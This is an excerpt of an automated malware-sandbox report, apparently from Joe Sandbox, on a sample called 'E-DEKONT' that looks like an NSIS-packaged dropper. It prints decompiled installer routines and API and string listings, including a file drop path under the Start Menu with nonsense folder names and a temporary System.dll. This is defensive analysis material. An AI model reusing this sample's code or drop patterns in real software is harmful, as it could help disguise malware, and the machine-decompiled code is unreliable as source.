                                                                            							__eflags = _t47 - 0x25;
                                                                            							if(_t47 != 0x25) {
                                                                            								__eflags = _t47 - 0x24;
                                                                            								if(_t47 == 0x24) {
                                                                            									GetWindowsDirectoryW(_t110, 0x400);
                                                                            									_t108 = 0;
                                                                            								}
                                                                            								while(1) {
                                                                            									__eflags = _t108;
                                                                            									if(_t108 == 0) {
                                                                            										goto L30;
                                                                            									}
                                                                            									_t58 =  *0x434ee4;
                                                                            									_t108 = _t108 - 1;
                                                                            									__eflags = _t58;
                                                                            									if(_t58 == 0) {
                                                                            										L26:
                                                                            										_t60 = SHGetSpecialFolderLocation( *0x434ee8,  *(_t112 + _t108 * 4 - 0x18),  &_v12);
                                                                            										__eflags = _t60;
                                                                            										if(_t60 != 0) {
                                                                            											L28:
                                                                            											 *_t110 =  *_t110 & 0x00000000;
                                                                            											__eflags =  *_t110;
                                                                            											continue;
                                                                            										}
                                                                            										__imp__SHGetPathFromIDListW(_v12, _t110);
                                                                            										__imp__CoTaskMemFree(_v12);
                                                                            										__eflags = _t60;
                                                                            										if(_t60 != 0) {
                                                                            											goto L30;
                                                                            										}
                                                                            										goto L28;
                                                                            									}
                                                                            									__eflags = _v8;
                                                                            									if(_v8 == 0) {
                                                                            										goto L26;
                                                                            									}
                                                                            									_t62 =  *_t58( *0x434ee8,  *(_t112 + _t108 * 4 - 0x18), 0, 0, _t110); // executed
                                                                            									__eflags = _t62;
                                                                            									if(_t62 == 0) {
                                                                            										goto L30;
                                                                            									}
                                                                            									goto L26;
                                                                            								}
                                                                            								goto L30;
                                                                            							}
                                                                            							GetSystemDirectoryW(_t110, 0x400);
                                                                            							goto L30;
                                                                            						} else {
                                                                            							E00406150( *0x434f38, __eflags, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t47 & 0x0000003f) * 2, _t110, _t47 & 0x00000040); // executed
                                                                            							__eflags =  *_t110;
                                                                            							if( *_t110 != 0) {
                                                                            								L32:
                                                                            								__eflags = _t76 - 0x1a;
                                                                            								if(_t76 == 0x1a) {
                                                                            									lstrcatW(_t110, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                            								}
                                                                            								goto L34;
                                                                            							}
                                                                            							E004062A4(_t76, _t108, _t110, _t110, _t76);
                                                                            							L30:
                                                                            							__eflags =  *_t110;
                                                                            							if( *_t110 == 0) {
                                                                            								goto L34;
                                                                            							}
                                                                            							_t76 = _v16;
                                                                            							goto L32;
                                                                            						}
                                                                            					}
                                                                            					__eflags = _t86 - 0x5a04;
                                                                            					if(_t86 == 0x5a04) {
                                                                            						goto L13;
                                                                            					}
                                                                            					__eflags = _t76 - 0x23;
                                                                            					if(_t76 == 0x23) {
                                                                            						goto L13;
                                                                            					}
                                                                            					__eflags = _t76 - 0x2e;
                                                                            					if(_t76 == 0x2e) {
                                                                            						goto L13;
                                                                            					} else {
                                                                            						_v8 = _v8 & 0x00000000;
                                                                            						goto L14;
                                                                            					}
                                                                            				}
                                                                            				 *_t110 =  *_t110 & 0x00000000;
                                                                            				if(_a4 == 0) {
                                                                            					return _t44;
                                                                            				}
                                                                            				return E00406282(_a4, _t44);
                                                                            			}






























                                                                            0x00406382
                                                                            0x004064fc
                                                                            0x00406507
                                                                            0x00406513
                                                                            0x00406513
                                                                            0x00000000

                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063E5
                                                                            • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,0042C228,?,0040531D,0042C228,00000000), ref: 004063F8
                                                                            • SHGetSpecialFolderLocation.SHELL32(0040531D,0041D800,00000000,0042C228,?,0040531D,0042C228,00000000), ref: 00406434
                                                                            • SHGetPathFromIDListW.SHELL32(0041D800,Call), ref: 00406442
                                                                            • CoTaskMemFree.OLE32(0041D800), ref: 0040644D
                                                                            • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406473
                                                                            • lstrlenW.KERNEL32(Call,00000000,0042C228,?,0040531D,0042C228,00000000), ref: 004064CB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                            • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                            • API String ID: 717251189-1230650788
                                                                            • Opcode ID: 5757adc76ebd299de9e3f21c9246a654aa3bace2b5e710508428971d5ba8c1fc
                                                                            • Instruction ID: 2bc9f3e321a063d065e255e84c3e845f89f4622f689527909a28eedc1d3cb15f
                                                                            • Opcode Fuzzy Hash: 5757adc76ebd299de9e3f21c9246a654aa3bace2b5e710508428971d5ba8c1fc
                                                                            • Instruction Fuzzy Hash: 1D613631A00205ABDF209F64CD41ABE37A5AF44318F16813FE947B62D1D77C5AA1CB9D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            [Figure: control-flow graph of function E0040176F, entry at 0040176F; legend: executed / not executed nodes]
                                                                            C-Code - Quality: 61%
                                                                            			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                                            				void* __edi;
                                                                            				void* _t35;
                                                                            				void* _t43;
                                                                            				void* _t45;
                                                                            				FILETIME* _t51;
                                                                            				FILETIME* _t64;
                                                                            				void* _t66;
                                                                            				signed int _t72;
                                                                            				FILETIME* _t73;
                                                                            				FILETIME* _t77;
                                                                            				signed int _t79;
                                                                            				void* _t81;
                                                                            				void* _t82;
                                                                            				WCHAR* _t84;
                                                                            				void* _t86;
                                                                            
                                                                            				_t77 = __ebx;
                                                                            				 *(_t86 - 8) = E00402C37(0x31);
                                                                            				 *(_t86 + 8) =  *(_t86 - 0x28) & 0x00000007;
                                                                            				_t35 = E00405BCA( *(_t86 - 8));
                                                                            				_push( *(_t86 - 8));
                                                                            				_t84 = L"Call";
                                                                            				if(_t35 == 0) {
                                                                            					lstrcatW(E00405B53(E00406282(_t84, L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Ydervgg\\Superassume\\dodecaheddra\\Sldede")), ??);
                                                                            				} else {
                                                                            					E00406282();
                                                                            				}
                                                                            				E00406516(_t84);
                                                                            				while(1) {
                                                                            					__eflags =  *(_t86 + 8) - 3;
                                                                            					if( *(_t86 + 8) >= 3) {
                                                                            						_t66 = E004065C5(_t84);
                                                                            						_t79 = 0;
                                                                            						__eflags = _t66 - _t77;
                                                                            						if(_t66 != _t77) {
                                                                            							_t73 = _t66 + 0x14;
                                                                            							__eflags = _t73;
                                                                            							_t79 = CompareFileTime(_t73, _t86 - 0x1c);
                                                                            						}
                                                                            						asm("sbb eax, eax");
                                                                            						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                                            						__eflags = _t72;
                                                                            						 *(_t86 + 8) = _t72;
                                                                            					}
                                                                            					__eflags =  *(_t86 + 8) - _t77;
                                                                            					if( *(_t86 + 8) == _t77) {
                                                                            						E00405D4F(_t84);
                                                                            					}
                                                                            					__eflags =  *(_t86 + 8) - 1;
                                                                            					_t43 = E00405D74(_t84, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                                            					__eflags = _t43 - 0xffffffff;
                                                                            					 *(_t86 - 0x30) = _t43;
                                                                            					if(_t43 != 0xffffffff) {
                                                                            						break;
                                                                            					}
                                                                            					__eflags =  *(_t86 + 8) - _t77;
                                                                            					if( *(_t86 + 8) != _t77) {
                                                                            						E004052E6(0xffffffe2,  *(_t86 - 8));
                                                                            						__eflags =  *(_t86 + 8) - 2;
                                                                            						if(__eflags == 0) {
                                                                            							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                                            						}
                                                                            						L31:
                                                                            						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
                                                                            						__eflags =  *0x434f88;
                                                                            						goto L32;
                                                                            					} else {
                                                                            						E00406282("C:\Users\Arthur\AppData\Local\Temp\nsx82F6.tmp", _t81);
                                                                            						E00406282(_t81, _t84);
                                                                            						E004062A4(_t77, _t81, _t84, "C:\Users\Arthur\AppData\Local\Temp\nsx82F6.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x14)));
                                                                            						E00406282(_t81, "C:\Users\Arthur\AppData\Local\Temp\nsx82F6.tmp");
                                                                            						_t64 = E004058E4("C:\Users\Arthur\AppData\Local\Temp\nsx82F6.tmp\System.dll",  *(_t86 - 0x28) >> 3) - 4;
                                                                            						__eflags = _t64;
                                                                            						if(_t64 == 0) {
                                                                            							continue;
                                                                            						} else {
                                                                            							__eflags = _t64 == 1;
                                                                            							if(_t64 == 1) {
                                                                            								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
                                                                            								L32:
                                                                            								_t51 = 0;
                                                                            								__eflags = 0;
                                                                            							} else {
                                                                            								_push(_t84);
                                                                            								_push(0xfffffffa);
                                                                            								E004052E6();
                                                                            								L29:
                                                                            								_t51 = 0x7fffffff;
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            					L33:
                                                                            					return _t51;
                                                                            				}
                                                                            				E004052E6(0xffffffea,  *(_t86 - 8));
                                                                            				 *0x434fb4 =  *0x434fb4 + 1;
                                                                            				_push(_t77);
                                                                            				_push(_t77);
                                                                            				_push( *(_t86 - 0x30));
                                                                            				_push( *((intOrPtr*)(_t86 - 0x20)));
                                                                            				_t45 = E004030FA(); // executed
                                                                            				 *0x434fb4 =  *0x434fb4 - 1;
                                                                            				__eflags =  *(_t86 - 0x1c) - 0xffffffff;
                                                                            				_t82 = _t45;
                                                                            				if( *(_t86 - 0x1c) != 0xffffffff) {
                                                                            					L22:
                                                                            					SetFileTime( *(_t86 - 0x30), _t86 - 0x1c, _t77, _t86 - 0x1c); // executed
                                                                            				} else {
                                                                            					__eflags =  *((intOrPtr*)(_t86 - 0x18)) - 0xffffffff;
                                                                            					if( *((intOrPtr*)(_t86 - 0x18)) != 0xffffffff) {
                                                                            						goto L22;
                                                                            					}
                                                                            				}
                                                                            				CloseHandle( *(_t86 - 0x30)); // executed
                                                                            				__eflags = _t82 - _t77;
                                                                            				if(_t82 >= _t77) {
                                                                            					goto L31;
                                                                            				} else {
                                                                            					__eflags = _t82 - 0xfffffffe;
                                                                            					if(_t82 != 0xfffffffe) {
                                                                            						E004062A4(_t77, _t82, _t84, _t84, 0xffffffee);
                                                                            					} else {
                                                                            						E004062A4(_t77, _t82, _t84, _t84, 0xffffffe9);
                                                                            						lstrcatW(_t84,  *(_t86 - 8));
                                                                            					}
                                                                            					_push(0x200010);
                                                                            					_push(_t84);
                                                                            					E004058E4();
                                                                            					goto L29;
                                                                            				}
                                                                            				goto L33;
                                                                            			}



















                                                                            APIs
                                                                            • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Sldede,?,?,00000031), ref: 004017D5
                                                                              • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                                              • Part of subcall function 004052E6: lstrlenW.KERNEL32(0042C228,00000000,0041D800,75F623A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                                              • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,75F623A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                                              • Part of subcall function 004052E6: lstrcatW.KERNEL32(0042C228,0040325E), ref: 00405341
                                                                              • Part of subcall function 004052E6: SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                                              • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                                              • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                                              • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsx82F6.tmp$C:\Users\user\AppData\Local\Temp\nsx82F6.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Sldede$Call
                                                                            • API String ID: 1941528284-2657128979
                                                                            • Opcode ID: 5b350da25249687dd4719405322e9856b363981bc1dd38a50fc9a6532880dae0
                                                                            • Instruction ID: 71989b97474780e21d9e3883d12846d469cfbdfaa42366440e3466e884ca0043
                                                                            • Opcode Fuzzy Hash: 5b350da25249687dd4719405322e9856b363981bc1dd38a50fc9a6532880dae0
                                                                            • Instruction Fuzzy Hash: C1419431900518BECF11BBA5DC46DAF3679EF45328F20423FF412B50E1DA3C8A519A6D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 899 4030fa-403111 900 403113 899->900 901 40311a-403123 899->901 900->901 902 403125 901->902 903 40312c-403131 901->903 902->903 904 403141-40314e call 403315 903->904 905 403133-40313c call 40332b 903->905 909 403303 904->909 910 403154-403158 904->910 905->904 911 403305-403306 909->911 912 4032ae-4032b0 910->912 913 40315e-4031a7 GetTickCount 910->913 914 40330e-403312 911->914 917 4032f0-4032f3 912->917 918 4032b2-4032b5 912->918 915 40330b 913->915 916 4031ad-4031b5 913->916 915->914 920 4031b7 916->920 921 4031ba-4031c8 call 403315 916->921 922 4032f5 917->922 923 4032f8-403301 call 403315 917->923 918->915 919 4032b7 918->919 924 4032ba-4032c0 919->924 920->921 921->909 933 4031ce-4031d7 921->933 922->923 923->909 931 403308 923->931 927 4032c2 924->927 928 4032c4-4032d2 call 403315 924->928 927->928 928->909 936 4032d4-4032d9 call 405e26 928->936 931->915 935 4031dd-4031fd call 4067bd 933->935 941 403203-403216 GetTickCount 935->941 942 4032a6-4032a8 935->942 940 4032de-4032e0 936->940 943 4032e2-4032ec 940->943 944 4032aa-4032ac 940->944 945 403261-403263 941->945 946 403218-403220 941->946 942->911 943->924 949 4032ee 943->949 944->911 947 403265-403269 945->947 948 40329a-40329e 945->948 950 403222-403226 946->950 951 403228-40325e MulDiv wsprintfW call 4052e6 946->951 952 403280-40328b 947->952 953 40326b-403272 call 405e26 947->953 948->916 954 4032a4 948->954 949->915 950->945 950->951 951->945 958 40328e-403292 952->958 959 403277-403279 953->959 954->915 958->935 960 403298 958->960 959->944 961 40327b-40327e 959->961 960->915 961->958
                                                                            C-Code - Quality: 95%
                                                                            			E004030FA(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                                                            				signed int _v8;
                                                                            				int _v12;
                                                                            				intOrPtr _v16;
                                                                            				long _v20;
                                                                            				intOrPtr _v24;
                                                                            				short _v152;
                                                                            				void* _t65;
                                                                            				void* _t69;
                                                                            				long _t70;
                                                                            				intOrPtr _t75;
                                                                            				long _t76;
                                                                            				intOrPtr _t77;
                                                                            				void* _t78;
                                                                            				int _t88;
                                                                            				intOrPtr _t92;
                                                                            				intOrPtr _t95;
                                                                            				long _t96;
                                                                            				signed int _t97;
                                                                            				int _t98;
                                                                            				int _t99;
                                                                            				intOrPtr _t100;
                                                                            				void* _t101;
                                                                            				void* _t102;
                                                                            
                                                                            				_t97 = _a16;
                                                                            				_t92 = _a12;
                                                                            				_v12 = _t97;
                                                                            				if(_t92 == 0) {
                                                                            					_v12 = 0x8000;
                                                                            				}
                                                                            				_v8 = _v8 & 0x00000000;
                                                                            				_v16 = _t92;
                                                                            				if(_t92 == 0) {
                                                                            					_v16 = 0x41aa00;
                                                                            				}
                                                                            				_t62 = _a4;
                                                                            				if(_a4 >= 0) {
                                                                            					E0040332B( *0x434f58 + _t62);
                                                                            				}
                                                                            				if(E00403315( &_a16, 4) == 0) {
                                                                            					L41:
                                                                            					_push(0xfffffffd);
                                                                            					goto L42;
                                                                            				} else {
                                                                            					if((_a19 & 0x00000080) == 0) {
                                                                            						if(_t92 != 0) {
                                                                            							if(_a16 < _t97) {
                                                                            								_t97 = _a16;
                                                                            							}
                                                                            							if(E00403315(_t92, _t97) != 0) {
                                                                            								_v8 = _t97;
                                                                            								L44:
                                                                            								return _v8;
                                                                            							} else {
                                                                            								goto L41;
                                                                            							}
                                                                            						}
                                                                            						if(_a16 <= _t92) {
                                                                            							goto L44;
                                                                            						}
                                                                            						_t88 = _v12;
                                                                            						while(1) {
                                                                            							_t98 = _a16;
                                                                            							if(_a16 >= _t88) {
                                                                            								_t98 = _t88;
                                                                            							}
                                                                            							if(E00403315(0x416a00, _t98) == 0) {
                                                                            								goto L41;
                                                                            							}
                                                                            							_t69 = E00405E26(_a8, 0x416a00, _t98); // executed
                                                                            							if(_t69 == 0) {
                                                                            								L28:
                                                                            								_push(0xfffffffe);
                                                                            								L42:
                                                                            								_pop(_t65);
                                                                            								return _t65;
                                                                            							}
                                                                            							_v8 = _v8 + _t98;
                                                                            							_a16 = _a16 - _t98;
                                                                            							if(_a16 > 0) {
                                                                            								continue;
                                                                            							}
                                                                            							goto L44;
                                                                            						}
                                                                            						goto L41;
                                                                            					}
                                                                            					_t70 = GetTickCount();
                                                                            					 *0x40d364 =  *0x40d364 & 0x00000000;
                                                                            					 *0x40d360 =  *0x40d360 & 0x00000000;
                                                                            					_t14 =  &_a16;
                                                                            					 *_t14 = _a16 & 0x7fffffff;
                                                                            					_v20 = _t70;
                                                                            					 *0x40ce48 = 8;
                                                                            					 *0x4169f0 = 0x40e9e8;
                                                                            					 *0x4169ec = 0x40e9e8;
                                                                            					 *0x4169e8 = 0x4169e8;
                                                                            					_a4 = _a16;
                                                                            					if( *_t14 <= 0) {
                                                                            						goto L44;
                                                                            					} else {
                                                                            						goto L9;
                                                                            					}
                                                                            					while(1) {
                                                                            						L9:
                                                                            						_t99 = 0x4000;
                                                                            						if(_a16 < 0x4000) {
                                                                            							_t99 = _a16;
                                                                            						}
                                                                            						if(E00403315(0x416a00, _t99) == 0) {
                                                                            							goto L41;
                                                                            						}
                                                                            						_a16 = _a16 - _t99;
                                                                            						 *0x40ce38 = 0x416a00;
                                                                            						 *0x40ce3c = _t99;
                                                                            						while(1) {
                                                                            							_t95 = _v16;
                                                                            							 *0x40ce40 = _t95;
                                                                            							 *0x40ce44 = _v12;
                                                                            							_t75 = E004067BD(0x40ce38);
                                                                            							_v24 = _t75;
                                                                            							if(_t75 < 0) {
                                                                            								break;
                                                                            							}
                                                                            							_t100 =  *0x40ce40; // 0x41d800
                                                                            							_t101 = _t100 - _t95;
                                                                            							_t76 = GetTickCount();
                                                                            							_t96 = _t76;
                                                                            							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
                                                                            								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                                            								_t102 = _t102 + 0xc;
                                                                            								E004052E6(0,  &_v152);
                                                                            								_v20 = _t96;
                                                                            							}
                                                                            							if(_t101 == 0) {
                                                                            								if(_a16 > 0) {
                                                                            									goto L9;
                                                                            								}
                                                                            								goto L44;
                                                                            							} else {
                                                                            								if(_a12 != 0) {
                                                                            									_t77 =  *0x40ce40; // 0x41d800
                                                                            									_v8 = _v8 + _t101;
                                                                            									_v12 = _v12 - _t101;
                                                                            									_v16 = _t77;
                                                                            									L23:
                                                                            									if(_v24 != 1) {
                                                                            										continue;
                                                                            									}
                                                                            									goto L44;
                                                                            								}
                                                                            								_t78 = E00405E26(_a8, _v16, _t101); // executed
                                                                            								if(_t78 == 0) {
                                                                            									goto L28;
                                                                            								}
                                                                            								_v8 = _v8 + _t101;
                                                                            								goto L23;
                                                                            							}
                                                                            						}
                                                                            						_push(0xfffffffc);
                                                                            						goto L42;
                                                                            					}
                                                                            					goto L41;
                                                                            				}
                                                                            			}


























                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403203
                                                                            0x00403209
                                                                            0x0040320b
                                                                            0x00403214
                                                                            0x00403216
                                                                            0x00403247
                                                                            0x0040324d
                                                                            0x00403259
                                                                            0x0040325e
                                                                            0x0040325e
                                                                            0x00403263
                                                                            0x0040329e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403265
                                                                            0x00403269
                                                                            0x00403280
                                                                            0x00403285
                                                                            0x00403288
                                                                            0x0040328b
                                                                            0x0040328e
                                                                            0x00403292
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403298
                                                                            0x00403272
                                                                            0x00403279
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040327b
                                                                            0x00000000
                                                                            0x0040327b
                                                                            0x00403263
                                                                            0x004032a6
                                                                            0x00000000
                                                                            0x004032a6
                                                                            0x00000000
                                                                            0x004031ad

                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: CountTick$wsprintf
                                                                            • String ID: ... %d%%$@
                                                                            • API String ID: 551687249-3859443358
                                                                            • Opcode ID: bcadc4b8fcc5a9726af7f1001a2bc5a9f2fe7a461361550fb019878be66ece88
                                                                            • Instruction ID: f75c430432033e5046526aed0a4a2f939c591a2e87bafbbe4e5c1659d7ec9983
                                                                            • Opcode Fuzzy Hash: bcadc4b8fcc5a9726af7f1001a2bc5a9f2fe7a461361550fb019878be66ece88
                                                                            • Instruction Fuzzy Hash: 85515A71900219EBDB10CF69DA84B9E7FA8AF45366F14417BEC14B72C0C778DA50CBA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 962 402644-40265d call 402c15 965 402663-40266a 962->965 966 402abf-402ac2 962->966 967 40266c 965->967 968 40266f-402672 965->968 969 402ac8-402ace 966->969 967->968 970 4027d6-4027de 968->970 971 402678-402687 call 4061e2 968->971 970->966 971->970 975 40268d 971->975 976 402693-402697 975->976 977 40272c-40272f 976->977 978 40269d-4026b8 ReadFile 976->978 979 402731-402734 977->979 980 402747-402757 call 405df7 977->980 978->970 981 4026be-4026c3 978->981 979->980 982 402736-402741 call 405e55 979->982 980->970 991 402759 980->991 981->970 984 4026c9-4026d7 981->984 982->970 982->980 987 402792-40279e call 4061c9 984->987 988 4026dd-4026ef MultiByteToWideChar 984->988 987->969 988->991 992 4026f1-4026f4 988->992 994 40275c-40275f 991->994 995 4026f6-402701 992->995 994->987 997 402761-402766 994->997 995->994 996 402703-402728 SetFilePointer MultiByteToWideChar 995->996 996->995 998 40272a 996->998 999 4027a3-4027a7 997->999 1000 402768-40276d 997->1000 998->991 1001 4027c4-4027d0 SetFilePointer 999->1001 1002 4027a9-4027ad 999->1002 1000->999 1003 40276f-402782 1000->1003 1001->970 1004 4027b5-4027c2 1002->1004 1005 4027af-4027b3 1002->1005 1003->970 1006 402784-40278a 1003->1006 1004->970 1005->1001 1005->1004 1006->976 1007 402790 1006->1007 1007->970
                                                                            C-Code - Quality: 83%
                                                                            			E00402644(intOrPtr __ebx, intOrPtr __edx, void* __esi) {
                                                                            				intOrPtr _t65;
                                                                            				intOrPtr _t66;
                                                                            				intOrPtr _t72;
                                                                            				void* _t76;
                                                                            				void* _t79;
                                                                            
                                                                            				_t72 = __edx;
                                                                            				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                                            				_t65 = 2;
                                                                            				 *((intOrPtr*)(_t76 - 0x48)) = _t65;
                                                                            				_t66 = E00402C15(_t65);
                                                                            				_t79 = _t66 - 1;
                                                                            				 *((intOrPtr*)(_t76 - 0x4c)) = _t72;
                                                                            				 *((intOrPtr*)(_t76 - 0x3c)) = _t66;
                                                                            				if(_t79 < 0) {
                                                                            					L36:
                                                                            					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
                                                                            				} else {
                                                                            					__ecx = 0x3ff;
                                                                            					if(__eax > 0x3ff) {
                                                                            						 *(__ebp - 0x3c) = 0x3ff;
                                                                            					}
                                                                            					if( *__esi == __bx) {
                                                                            						L34:
                                                                            						__ecx =  *(__ebp - 0xc);
                                                                            						__eax =  *(__ebp - 8);
                                                                            						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                                            						if(_t79 == 0) {
                                                                            							 *(_t76 - 4) = 1;
                                                                            						}
                                                                            						goto L36;
                                                                            					} else {
                                                                            						 *(__ebp - 0x30) = __ebx;
                                                                            						 *(__ebp - 0x10) = E004061E2(__ecx, __esi);
                                                                            						if( *(__ebp - 0x3c) > __ebx) {
                                                                            							do {
                                                                            								if( *((intOrPtr*)(__ebp - 0x2c)) != 0x39) {
                                                                            									if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx ||  *(__ebp - 8) != __ebx || E00405E55( *(__ebp - 0x10), __ebx) >= 0) {
                                                                            										__eax = __ebp - 0x44;
                                                                            										if(E00405DF7( *(__ebp - 0x10), __ebp - 0x44, 2) == 0) {
                                                                            											goto L34;
                                                                            										} else {
                                                                            											goto L21;
                                                                            										}
                                                                            									} else {
                                                                            										goto L34;
                                                                            									}
                                                                            								} else {
                                                                            									__eax = __ebp - 0x38;
                                                                            									_push(__ebx);
                                                                            									_push(__ebp - 0x38);
                                                                            									__eax = 2;
                                                                            									__ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)) = __ebp + 0xa;
                                                                            									__eax = ReadFile( *(__ebp - 0x10), __ebp + 0xa, __ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)), ??, ??); // executed
                                                                            									if(__eax == 0) {
                                                                            										goto L34;
                                                                            									} else {
                                                                            										__ecx =  *(__ebp - 0x38);
                                                                            										if(__ecx == __ebx) {
                                                                            											goto L34;
                                                                            										} else {
                                                                            											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                                            											 *(__ebp - 0x48) = __ecx;
                                                                            											 *(__ebp - 0x44) = __eax;
                                                                            											if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
                                                                            												L28:
                                                                            												__ax & 0x0000ffff = E004061C9( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                                            											} else {
                                                                            												__ebp - 0x44 = __ebp + 0xa;
                                                                            												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x44, 1) != 0) {
                                                                            													L21:
                                                                            													__eax =  *(__ebp - 0x44);
                                                                            												} else {
                                                                            													__esi =  *(__ebp - 0x48);
                                                                            													__esi =  ~( *(__ebp - 0x48));
                                                                            													while(1) {
                                                                            														_t22 = __ebp - 0x38;
